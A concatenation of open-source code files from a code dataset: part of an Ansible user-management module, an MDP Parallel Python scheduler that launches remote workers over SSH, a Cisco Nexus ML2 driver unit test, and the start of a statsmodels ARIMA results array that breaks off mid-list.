'''Hide or show user on login window according SELF.SYSTEM.
Returns 0 if a change has been made, None otherwhise.'''
plist_file = '/Library/Preferences/com.apple.loginwindow.plist'
# http://support.apple.com/kb/HT5017?viewlocale=en_US
uid = int(self.uid)
cmd = [ 'defaults', 'read', plist_file, 'HiddenUsersList' ]
(rc, out, err) = self.execute_command(cmd)
# returned value is
# (
# "_userA",
# "_UserB",
# userc
# )
hidden_users = []
for x in out.splitlines()[1:-1]:
try:
x = x.split('"')[1]
except IndexError:
x = x.strip()
hidden_users.append(x)
if self.system:
if not self.name in hidden_users:
cmd = [ 'defaults', 'write', plist_file,
'HiddenUsersList', '-array-add', self.name ]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot user "%s" to hidden user list.'
% self.name, err=err, out=out, rc=rc)
return 0
else:
if self.name in hidden_users:
del(hidden_users[hidden_users.index(self.name)])
cmd = [ 'defaults', 'write', plist_file,
'HiddenUsersList', '-array' ] + hidden_users
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot remove user "%s" from hidden user list.'
% self.name, err=err, out=out, rc=rc)
return 0
def user_exists(self):
'''Check is SELF.NAME is a known user on the system.'''
cmd = self._get_dscl()
cmd += [ '-list', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd)
return rc == 0
def remove_user(self):
'''Delete SELF.NAME. If SELF.FORCE is true, remove its home directory.'''
info = self.user_info()
cmd = self._get_dscl()
cmd += [ '-delete', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot delete user "%s".'
% self.name, err=err, out=out, rc=rc)
if self.force:
if os.path.exists(info[5]):
shutil.rmtree(info[5])
out += "Removed %s" % info[5]
return (rc, out, err)
def create_user(self, command_name='dscl'):
cmd = self._get_dscl()
cmd += [ '-create', '/Users/%s' % self.name]
(rc, err, out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot create user "%s".'
% self.name, err=err, out=out, rc=rc)
self._make_group_numerical()
# Homedir is not created by default
if self.createhome:
if self.home is None:
self.home = '/Users/%s' % self.name
if not os.path.exists(self.home):
os.makedirs(self.home)
self.chown_homedir(int(self.uid), int(self.group), self.home)
for field in self.fields:
if self.__dict__.has_key(field[0]) and self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += [ '-create', '/Users/%s' % self.name,
field[1], self.__dict__[field[0]]]
(rc, _err, _out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot add property "%s" to user "%s".'
% (field[0], self.name), err=err, out=out, rc=rc)
out += _out
err += _err
if rc != 0:
return (rc, _err, _out)
(rc, _err, _out) = self._change_user_password()
out += _out
err += _err
self._update_system_user()
# here we don't care about change status since it is a creation,
# thus changed is always true.
(rc, _out, _err, changed) = self._modify_group()
out += _out
err += _err
return (rc, err, out)
def modify_user(self):
changed = None
out = ''
err = ''
self._make_group_numerical()
for field in self.fields:
if self.__dict__.has_key(field[0]) and self.__dict__[field[0]]:
current = self._get_user_property(field[1])
if current is None or current != self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += [ '-create', '/Users/%s' % self.name,
field[1], self.__dict__[field[0]]]
(rc, _err, _out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot update property "%s" for user "%s".'
% (field[0], self.name), err=err, out=out, rc=rc)
changed = rc
out += _out
err += _err
if self.update_password == 'always':
(rc, _err, _out) = self._change_user_password()
out += _out
err += _err
changed = rc
(rc, _out, _err, _changed) = self._modify_group()
out += _out
err += _err
if _changed is True:
changed = rc
rc = self._update_system_user()
if rc == 0:
changed = rc
return (changed, out, err)
# ===========================================
class AIX(User):
"""
This is a AIX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'AIX'
distribution = None
SHADOWFILE = '/etc/security/passwd'
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self, command_name='useradd'):
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.createhome:
cmd.append('-m')
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.password is not None:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
self.execute_command(' '.join(cmd), data="%s:%s" % (self.name, self.password))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
# skip if no changes to be made
if len(cmd) == 1:
(rc, out, err) = (None, '', '')
elif self.module.check_mode:
return (True, '', '')
else:
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
(rc2, out2, err2) = self.execute_command(' '.join(cmd), data="%s:%s" % (self.name, self.password))
else:
(rc2, out2, err2) = (None, '', '')
if rc != None:
return (rc, out+out2, err+err2)
else:
return (rc2, out+out2, err+err2)
# ===========================================
class HPUX(User):
"""
This is a HP-UX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'HP-UX'
distribution = None
SHADOWFILE = '/etc/shadow'
def create_user(self):
cmd = ['/usr/sam/lbin/useradd.sam']
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.createhome:
cmd.append('-m')
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user(self):
cmd = ['/usr/sam/lbin/userdel.sam']
if self.force:
cmd.append('-F')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = ['/usr/sam/lbin/usermod.sam']
info = self.user_info()
has_append = self._check_usermod_append()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
if has_append:
cmd.append('-a')
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if self.append and not has_append:
cmd.append('-A')
cmd.append(','.join(group_diff))
else:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
elif self.module.check_mode:
return (0, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
# ===========================================
def main():
ssh_defaults = {
'bits': '2048',
'type': 'rsa',
'passphrase': None,
'comment': 'ansible-generated on %s' % socket.gethostname()
}
module = AnsibleModule(
argument_spec = dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
name=dict(required=True, aliases=['user'], type='str'),
uid=dict(default=None, type='str'),
non_unique=dict(default='no', type='bool'),
group=dict(default=None, type='str'),
groups=dict(default=None, type='str'),
comment=dict(default=None, type='str'),
home=dict(default=None, type='str'),
shell=dict(default=None, type='str'),
password=dict(default=None, type='str'),
login_class=dict(default=None, type='str'),
# following options are specific to userdel
force=dict(default='no', type='bool'),
remove=dict(default='no', type='bool'),
# following options are specific to useradd
createhome=dict(default='yes', type='bool'),
system=dict(default='no', type='bool'),
# following options are specific to usermod
move_home=dict(default='no', type='bool'),
append=dict(default='no', type='bool'),
# following are specific to ssh key generation
generate_ssh_key=dict(type='bool'),
ssh_key_bits=dict(default=ssh_defaults['bits'], type='str'),
ssh_key_type=dict(default=ssh_defaults['type'], type='str'),
ssh_key_file=dict(default=None, type='str'),
ssh_key_comment=dict(default=ssh_defaults['comment'], type='str'),
ssh_key_passphrase=dict(default=None, type='str'),
update_password=dict(default='always',choices=['always','on_create'],type='str'),
expires=dict(default=None, type='float'),
),
supports_check_mode=True
)
user = User(module)
if user.syslogging:
syslog.openlog('ansible-%s' % os.path.basename(__file__))
syslog.syslog(syslog.LOG_NOTICE, 'User instantiated - platform %s' % user.platform)
if user.distribution:
syslog.syslog(syslog.LOG_NOTICE, 'User instantiated - distribution %s' % user.distribution)
rc = None
out = ''
err = ''
result = {}
result['name'] = user.name
result['state'] = user.state
if user.state == 'absent':
if user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.remove_user()
if rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
result['force'] = user.force
result['remove'] = user.remove
elif user.state == 'present':
if not user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.create_user()
result['system'] = user.system
result['createhome'] = user.createhome
else:
# modify user (note: this function is check mode aware)
(rc, out, err) = user.modify_user()
result['append'] = user.append
result['move_home'] = user.move_home
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if user.password is not None:
result['password'] = 'NOT_LOGGING_PASSWORD'
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
if user.user_exists():
info = user.user_info()
if info == False:
result['msg'] = "failed to look up user name: %s" % user.name
result['failed'] = True
result['uid'] = info[2]
result['group'] = info[3]
result['comment'] = info[4]
result['home'] = info[5]
result['shell'] = info[6]
result['uid'] = info[2]
if user.groups is not None:
result['groups'] = user.groups
# handle missing homedirs
info = user.user_info()
if user.home is None:
user.home = info[5]
if not os.path.exists(user.home) and user.createhome:
if not module.check_mode:
user.create_homedir(user.home)
user.chown_homedir(info[2], info[3], user.home)
result['changed'] = True
# deal with ssh key
if user.sshkeygen:
(rc, out, err) = user.ssh_key_gen()
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if rc == 0:
result['changed'] = True
(rc, out, err) = user.ssh_key_fingerprint()
if rc == 0:
result['ssh_fingerprint'] = out.strip()
else:
result['ssh_fingerprint'] = err.strip()
result['ssh_key_file'] = user.get_ssh_key_path()
result['ssh_public_key'] = user.get_ssh_public_key()
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
main()
|
gpl-3.0
|
ME-ICA/me-ica
|
meica.libs/mdp/parallel/pp_support.py
|
1
|
13771
|
"""
Adapters for the Parallel Python library (http://www.parallelpython.com).
The PPScheduler class uses an existing pp scheduler and is a simple adapter.
LocalPPScheduler includes the creation of a local pp scheduler.
NetworkPPScheduler includes the management of the remote slaves via SSH.
"""
from __future__ import with_statement
import sys
import os
import time
import subprocess
import signal
import traceback
import tempfile
import scheduling
import pp
import mdp
TEMPDIR_PREFIX='pp4mdp-monkeypatch.'
def _monkeypatch_pp(container_dir):
"""Apply a hack for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=620551.
Importing numpy fails because the parent directory of the slave
script (/usr/share/pyshared) is added to the begging of sys.path.
This is a temporary fix until parallel python or the way it is
packaged in debian is changed.
This function monkey-patches the ppworker module and changes the
path to the slave script. A temporary directory is created and the
worker script is copied there.
The temporary directory should be automatically removed when this
module is destroyed.
XXX: remove this when parallel python or the way it is packaged in debian is changed.
"""
import os.path, shutil
# this part copied from pp.py, should give the same result hopefully
ppworker = os.path.join(os.path.dirname(os.path.abspath(pp.__file__)),
'ppworker.py')
global _ppworker_dir
_ppworker_dir = mdp.utils.TemporaryDirectory(prefix=TEMPDIR_PREFIX, dir=container_dir)
ppworker3 = os.path.join(_ppworker_dir.name, 'ppworker.py')
shutil.copy(ppworker, ppworker3)
mdp._pp_worker_command = pp._Worker.command[:]
try:
pp._Worker.command[pp._Worker.command.index(ppworker)] = ppworker3
except TypeError:
# pp 1.6.0 compatibility
pp._Worker.command = pp._Worker.command.replace(ppworker, ppworker3)
if hasattr(mdp.config, 'pp_monkeypatch_dirname'):
_monkeypatch_pp(mdp.config.pp_monkeypatch_dirname)
class PPScheduler(scheduling.Scheduler):
"""Adaptor scheduler for the parallel python scheduler.
This scheduler is a simple wrapper for a pp server. A pp server instance
has to be provided.
"""
def __init__(self, ppserver, max_queue_length=1,
result_container=None, verbose=False):
"""Initialize the scheduler.
ppserver -- Parallel Python Server instance.
max_queue_length -- How long the queue can get before add_task blocks.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
verbose -- If True to get progress reports from the scheduler.
"""
if result_container is None:
result_container = scheduling.ListResultContainer()
super(PPScheduler, self).__init__(result_container=result_container,
verbose=verbose)
self.ppserver = ppserver
self.max_queue_length = max_queue_length
def _process_task(self, data, task_callable, task_index):
"""Non-blocking processing of tasks.
Depending on the scheduler state this function is non-blocking or
blocking. One reason for blocking can be a full task-queue.
"""
task = (data, task_callable.fork(), task_index)
def execute_task(task):
"""Call the first args entry and return the return value."""
data, task_callable, task_index = task
task_callable.setup_environment()
return task_callable(data), task_index
while True:
if len(self.ppserver._Server__queue) > self.max_queue_length:
# release lock for other threads and wait
self._lock.release()
time.sleep(0.5)
self._lock.acquire()
else:
# release lock to enable result storage
self._lock.release()
# the inner tuple is a trick to prevent introspection by pp
# this forces pp to simply pickle the object
self.ppserver.submit(execute_task, args=(task,),
callback=self._pp_result_callback)
break
def _pp_result_callback(self, result):
"""Calback method for pp to unpack the result and the task id.
This method then calls the normal _store_result method.
"""
if result is None:
result = (None, None)
self._store_result(*result)
def _shutdown(self):
"""Call destroy on the ppserver."""
self.ppserver.destroy()
class LocalPPScheduler(PPScheduler):
"""Uses a local pp server to distribute the work across cpu cores.
The pp server is created automatically instead of being provided by the
user (in contrast to PPScheduler).
"""
def __init__(self, ncpus="autodetect", max_queue_length=1,
result_container=None, verbose=False):
"""Create an internal pp server and initialize the scheduler.
ncpus -- Integer or 'autodetect', specifies the number of processes
used.
max_queue_length -- How long the queue can get before add_task blocks.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
verbose -- If True to get progress reports from the scheduler.
"""
ppserver = pp.Server(ncpus=ncpus)
super(LocalPPScheduler, self).__init__(ppserver=ppserver,
max_queue_length=max_queue_length,
result_container=result_container,
verbose=verbose)
# default secret
SECRET = "rosebud"
class NetworkPPScheduler(PPScheduler):
"""Scheduler which can manage pp remote servers (requires SSH).
The remote slave servers are automatically started and killed at the end.
Since the slaves are started via SSH this schduler does not work on normal
Windows systems. On such systems you can start the pp slaves
manually and then use the standard PPScheduler.
"""
def __init__(self, max_queue_length=1,
result_container=None,
verbose=False,
remote_slaves=None,
source_paths=None,
port=50017,
secret=SECRET,
nice=-19,
timeout=3600,
n_local_workers=0,
slave_kill_filename=None,
remote_python_executable=None):
"""Initialize the remote slaves and create the internal pp scheduler.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
verbose -- If True to get progress reports from the scheduler.
remote_slaves -- List of tuples, the first tuple entry is a string
containing the name or IP adress of the slave, the second entry
contains the number of processes (i.e. the pp ncpus parameter).
The second entry can be None to use 'autodetect'.
source_paths -- List of paths that will be appended to sys.path in the
slaves.
n_local_workers -- Value of ncpus for this machine.
secret -- Secret password to secure the remote slaves.
slave_kill_filename -- Filename (including path) where a list of the
remote slave processes should be stored. Together with the
'kill_slaves' function this makes it possible to quickly all
remote slave processes in case something goes wrong.
If None, a tempfile is created.
"""
self._remote_slaves = remote_slaves
self._running_remote_slaves = None # list of strings 'address:port'
# list with processes for the ssh connections to the slaves
self._ssh_procs = None
self._remote_pids = None # list of the pids of the remote servers
self._port = port
if slave_kill_filename is None:
slave_kill_file = tempfile.mkstemp(prefix='MDPtmp-')[1]
self.slave_kill_file = slave_kill_file
self._secret = secret
self._slave_nice = nice
self._timeout = timeout
if not source_paths:
self._source_paths = []
else:
self._source_paths = source_paths
if remote_python_executable is None:
remote_python_executable = sys.executable
self._python_executable = remote_python_executable
module_file = os.path.abspath(__file__)
self._script_path = os.path.dirname(module_file)
self.verbose = verbose
# start ppserver
self._start_slaves()
ppslaves = tuple(["%s:%d" % (address, self._port)
for address in self._running_remote_slaves])
ppserver = pp.Server(ppservers=ppslaves,
ncpus=n_local_workers,
secret=self._secret)
super(NetworkPPScheduler, self).__init__(ppserver=ppserver,
max_queue_length=max_queue_length,
result_container=result_container,
verbose=verbose)
def _shutdown(self):
"""Shutdown all slaves."""
for ssh_proc in self._ssh_procs:
os.kill(ssh_proc.pid, signal.SIGQUIT)
super(NetworkPPScheduler, self)._shutdown()
if self.verbose:
print "All slaves shut down."
def start_slave(self, address, ncpus="autodetect"):
"""Start a single remote slave.
The return value is a tuple of the ssh process handle and
the remote pid.
"""
try:
print "starting slave " + address + " ..."
proc = subprocess.Popen(["ssh","-T", "%s" % address],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
proc.stdin.write("cd %s\n" % self._script_path)
cmd = (self._python_executable +
" pp_slave_script.py %d %d %d %s %d" %
(self._slave_nice, self._port, self._timeout, self._secret,
ncpus))
proc.stdin.write(cmd + "\n")
# send additional information to the remote process
proc.stdin.write(self._python_executable + "\n")
for sys_path in self._source_paths:
proc.stdin.write(sys_path + "\n")
proc.stdin.write("_done_" + "\n")
# print status message from slave
sys.stdout.write(address + ": " + proc.stdout.readline())
# get PID for remote slave process
pid = None
if self.verbose:
print "*** output from slave %s ***" % address
while pid is None:
# the slave process might first output some hello message
try:
value = proc.stdout.readline()
if self.verbose:
print value
pid = int(value)
except ValueError:
pass
if self.verbose:
print "*** output end ***"
return (proc, pid)
except:
print "Initialization of slave %s has failed." % address
traceback.print_exc()
return None
def _start_slaves(self):
"""Start remote slaves.
The slaves that could be started are stored in a textfile, in the form
name:port:pid
"""
with open(self.slave_kill_file, 'w') as slave_kill_file:
self._running_remote_slaves = []
self._remote_pids = []
self._ssh_procs = []
for (address, ncpus) in self._remote_slaves:
ssh_proc, pid = self.start_slave(address, ncpus=ncpus)
if pid is not None:
slave_kill_file.write("%s:%d:%d\n" %
(address, pid, ssh_proc.pid))
self._running_remote_slaves.append(address)
self._remote_pids.append(pid)
self._ssh_procs.append(ssh_proc)
def kill_slaves(slave_kill_filename):
"""Kill all remote slaves which are stored in the given file.
This functions is only meant for emergency situations, when something
went wrong and the slaves have to be killed manually.
"""
with open(slave_kill_filename) as tempfile:
for line in tempfile:
address, pid, ssh_pid = line.split(":")
pid = int(pid)
ssh_pid = int(ssh_pid)
# open ssh connection to to kill remote slave
proc = subprocess.Popen(["ssh","-T", address],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
proc.stdin.write("kill %d\n" % pid)
proc.stdin.flush()
# kill old ssh connection
try:
os.kill(ssh_pid, signal.SIGKILL)
except:
pass
# a kill might prevent the kill command transmission
# os.kill(proc.pid, signal.SIGQUIT)
print "killed slave " + address + " (pid %d)" % pid
print "all slaves killed."
if __name__ == "__main__":
if len(sys.argv) == 2:
kill_slaves(sys.argv[1])
else:
sys.stderr.write("usage: %s slave_list.txt\n" % __file__)
|
lgpl-2.1
|
nikolay-fedotov/networking-cisco
|
networking_cisco/tests/unit/ml2/drivers/cisco/nexus/test_cisco_nexus.py
|
1
|
7977
|
# Copyright (c) 2013 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import mock
from oslo_utils import importutils
import testtools
from networking_cisco.plugins.ml2.drivers.cisco.nexus import (
nexus_network_driver)
from networking_cisco.plugins.ml2.drivers.cisco.nexus import constants
from networking_cisco.plugins.ml2.drivers.cisco.nexus import exceptions
from networking_cisco.plugins.ml2.drivers.cisco.nexus import mech_cisco_nexus
from networking_cisco.plugins.ml2.drivers.cisco.nexus import nexus_db_v2
from neutron.common import constants as n_const
from neutron.extensions import portbindings
from neutron.plugins.ml2 import driver_api as api
from neutron.tests.unit import testlib_api
NEXUS_IP_ADDRESS = '1.1.1.1'
NEXUS_IP_ADDRESS_PC = '2.2.2.2'
NEXUS_IP_ADDRESS_DUAL = '3.3.3.3'
HOST_NAME_1 = 'testhost1'
HOST_NAME_2 = 'testhost2'
HOST_NAME_PC = 'testpchost'
HOST_NAME_DUAL = 'testdualhost'
INSTANCE_1 = 'testvm1'
INSTANCE_2 = 'testvm2'
INSTANCE_PC = 'testpcvm'
INSTANCE_DUAL = 'testdualvm'
NEXUS_PORT_1 = 'ethernet:1/10'
NEXUS_PORT_2 = 'ethernet:1/20'
NEXUS_PORTCHANNELS = 'portchannel:2'
NEXUS_DUAL = 'ethernet:1/3,portchannel:2'
VLAN_ID_1 = 267
VLAN_ID_2 = 265
VLAN_ID_PC = 268
VLAN_ID_DUAL = 269
DEVICE_OWNER = 'compute:test'
NEXUS_SSH_PORT = '22'
PORT_STATE = n_const.PORT_STATUS_ACTIVE
NETWORK_TYPE = 'vlan'
NEXUS_DRIVER = ('networking_cisco.plugins.ml2.drivers.cisco.nexus.'
'nexus_network_driver.CiscoNexusDriver')
class FakeNetworkContext(object):
"""Network context for testing purposes only."""
def __init__(self, segment_id):
self._network_segments = {api.SEGMENTATION_ID: segment_id,
api.NETWORK_TYPE: NETWORK_TYPE}
@property
def network_segments(self):
return self._network_segments
class FakePortContext(object):
"""Port context for testing purposes only."""
def __init__(self, device_id, host_name, network_context):
self._port = {
'status': PORT_STATE,
'device_id': device_id,
'device_owner': DEVICE_OWNER,
portbindings.HOST_ID: host_name,
portbindings.VIF_TYPE: portbindings.VIF_TYPE_OVS
}
self._network = network_context
self._segment = network_context.network_segments
@property
def current(self):
return self._port
@property
def network(self):
return self._network
@property
def bottom_bound_segment(self):
return self._segment
class TestCiscoNexusDevice(testlib_api.SqlTestCase):
"""Unit tests for Cisco ML2 Nexus device driver."""
TestConfigObj = collections.namedtuple(
'TestConfigObj',
'nexus_ip_addr host_name nexus_port instance_id vlan_id')
test_configs = {
'test_config1': TestConfigObj(
NEXUS_IP_ADDRESS,
HOST_NAME_1,
NEXUS_PORT_1,
INSTANCE_1,
VLAN_ID_1),
'test_config2': TestConfigObj(
NEXUS_IP_ADDRESS,
HOST_NAME_2,
NEXUS_PORT_2,
INSTANCE_2,
VLAN_ID_2),
'test_config_portchannel': TestConfigObj(
NEXUS_IP_ADDRESS_PC,
HOST_NAME_PC,
NEXUS_PORTCHANNELS,
INSTANCE_PC,
VLAN_ID_PC),
'test_config_dual': TestConfigObj(
NEXUS_IP_ADDRESS_DUAL,
HOST_NAME_DUAL,
NEXUS_DUAL,
INSTANCE_DUAL,
VLAN_ID_DUAL),
}
def setUp(self):
"""Sets up mock ncclient, and switch and credentials dictionaries."""
super(TestCiscoNexusDevice, self).setUp()
# Use a mock netconf client
mock_ncclient = mock.Mock()
mock.patch.object(nexus_network_driver.CiscoNexusDriver,
'_import_ncclient',
return_value=mock_ncclient).start()
def new_nexus_init(mech_instance):
mech_instance.driver = importutils.import_object(NEXUS_DRIVER)
mech_instance._nexus_switches = {}
for name, config in TestCiscoNexusDevice.test_configs.items():
ip_addr = config.nexus_ip_addr
host_name = config.host_name
nexus_port = config.nexus_port
mech_instance._nexus_switches[(ip_addr,
host_name)] = nexus_port
mech_instance._nexus_switches[(ip_addr,
'ssh_port')] = NEXUS_SSH_PORT
mech_instance._nexus_switches[(ip_addr,
constants.USERNAME)] = 'admin'
mech_instance._nexus_switches[(ip_addr,
constants.PASSWORD)] = 'password'
mech_instance.driver.nexus_switches = (
mech_instance._nexus_switches)
mock.patch.object(mech_cisco_nexus.CiscoNexusMechanismDriver,
'__init__', new=new_nexus_init).start()
self._cisco_mech_driver = (mech_cisco_nexus.
CiscoNexusMechanismDriver())
def _create_delete_port(self, port_config):
"""Tests creation and deletion of a virtual port."""
nexus_ip_addr = port_config.nexus_ip_addr
host_name = port_config.host_name
nexus_port = port_config.nexus_port
instance_id = port_config.instance_id
vlan_id = port_config.vlan_id
network_context = FakeNetworkContext(vlan_id)
port_context = FakePortContext(instance_id, host_name,
network_context)
self._cisco_mech_driver.update_port_precommit(port_context)
self._cisco_mech_driver.update_port_postcommit(port_context)
for port_id in nexus_port.split(','):
bindings = nexus_db_v2.get_nexusport_binding(port_id,
vlan_id,
nexus_ip_addr,
instance_id)
self.assertEqual(len(bindings), 1)
self._cisco_mech_driver.delete_port_precommit(port_context)
self._cisco_mech_driver.delete_port_postcommit(port_context)
for port_id in nexus_port.split(','):
with testtools.ExpectedException(
exceptions.NexusPortBindingNotFound):
nexus_db_v2.get_nexusport_binding(port_id,
vlan_id,
nexus_ip_addr,
instance_id)
def test_create_delete_ports(self):
"""Tests creation and deletion of two new virtual Ports."""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config1'])
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config2'])
def test_create_delete_portchannel(self):
"""Tests creation of a port over a portchannel."""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config_portchannel'])
def test_create_delete_dual(self):
"""Tests creation and deletion of dual ports for single server"""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config_dual'])
|
apache-2.0
|
edhuckle/statsmodels
|
statsmodels/tsa/tests/results/arima111nc_css_results.py
|
36
|
43835
|
import numpy as np
llf = np.array([-242.89663276735])
nobs = np.array([ 202])
k = np.array([ 3])
k_exog = np.array([ 1])
sigma = np.array([ .8053519404535])
chi2 = np.array([ 15723.381396967])
df_model = np.array([ 2])
k_ar = np.array([ 1])
k_ma = np.array([ 1])
params = np.array([ .99479180506163,
-.84461527652809,
.64859174799221])
cov_params = np.array([ .00008904968254,
-.00023560410507,
.00012795903324,
-.00023560410507,
.00131628534915,
-.00022462340695,
.00012795903324,
-.00022462340695,
.0005651128627]).reshape(3,3)
xb = np.array([ 0,
0,
.02869686298072,
.05651443824172,
.0503994859755,
.06887971609831,
.05940540507436,
.08067328482866,
.08167565613985,
.06429278105497,
.07087650150061,
.06886467337608,
.06716959923506,
.08230647444725,
.07099691033363,
.08401278406382,
.07996553182602,
.07354256510735,
.09366323798895,
.08811800926924,
.10296355187893,
.08846370875835,
.0852297320962,
.08700425922871,
.09751411527395,
.09737934917212,
.11228405684233,
.1053489819169,
.12352022528648,
.16439816355705,
.1643835157156,
.19891132414341,
.17551273107529,
.17827558517456,
.19562774896622,
.21028305590153,
.23767858743668,
.24580039083958,
.28269505500793,
.29883882403374,
.31247469782829,
.35402658581734,
.37410452961922,
.39106267690659,
.42040377855301,
.44518512487411,
.43608102202415,
.44340893626213,
.44959822297096,
.40977239608765,
.42118826508522,
.40079545974731,
.38357082009315,
.36902260780334,
.35673499107361,
.36137464642525,
.38031083345413,
.47139286994934,
.47323387861252,
.60994738340378,
.69538277387619,
.7825602889061,
.84117436408997,
.9657689332962,
1.0109325647354,
.95897275209427,
.96013957262039,
.9461076259613,
.9342554807663,
.83413934707642,
.83968591690063,
.84437066316605,
.83330947160721,
.8990553021431,
.87949693202972,
.86297762393951,
.89407861232758,
.93536442518234,
1.0303052663803,
1.1104937791824,
1.1481873989105,
1.2851470708847,
1.4458787441254,
1.5515991449356,
